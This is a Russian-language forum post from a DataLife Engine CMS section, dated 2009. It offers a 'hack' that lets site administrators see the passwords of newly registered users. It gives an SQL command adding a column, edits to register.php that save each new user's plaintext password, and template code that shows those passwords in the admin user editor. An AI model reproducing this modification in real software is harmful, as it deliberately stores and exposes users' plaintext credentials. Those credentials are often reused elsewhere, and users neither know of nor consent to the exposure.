Хак пароли НОВЫХ пользователей

Тема в разделе "DLE", создана пользователем cosmos, 20 фев 2009.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.1 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. cosmos

    cosmos Постоялец

    Регистр.:
    27 ноя 2006
    Сообщения:
    129
    Симпатии:
    38
    [​IMG]

    Хак, для того, что бы видеть пароли новых, зарегистрированных пользователей.
    (только тех, кто зарегистрируется после установление хака!)

    Открыть phpMyAdmin и сделать запрос:
    Код:
    ALTER TABLE dle_users ADD `showpass` varchar( 40 ) NOT NULL;
    Открыть engine/modules/register.php и найти:
    Код:
    (name, password, email,
    Заменить на:
    Код:
    (name, password, showpass, email,
    Найти:
    Код:
    ('$name', '$regpassword', '$email',
    Заменить на:
    Код:
    ('$name', '$regpassword', '$password1', '$email',
    Открыть engine/inc/editusers.php и найти:
    Код:
    <tr>
            <td style="padding:4px;">{$lang['user_newpass']}</td>
            <td colspan="2"><input size="20" name="editpass" class="edit"></td>
        </tr>
    Ниже вставить:
    Код:
    <tr>
            <td style="padding:4px;">Password:</td>
            <td colspan="2">{$row['showpass']}</td>
        </tr>
    Автор: Mohammad Yekta


    Поиском не нашел. Если было, то delete
     
    antiterror нравится это.
Статус темы:
Закрыта.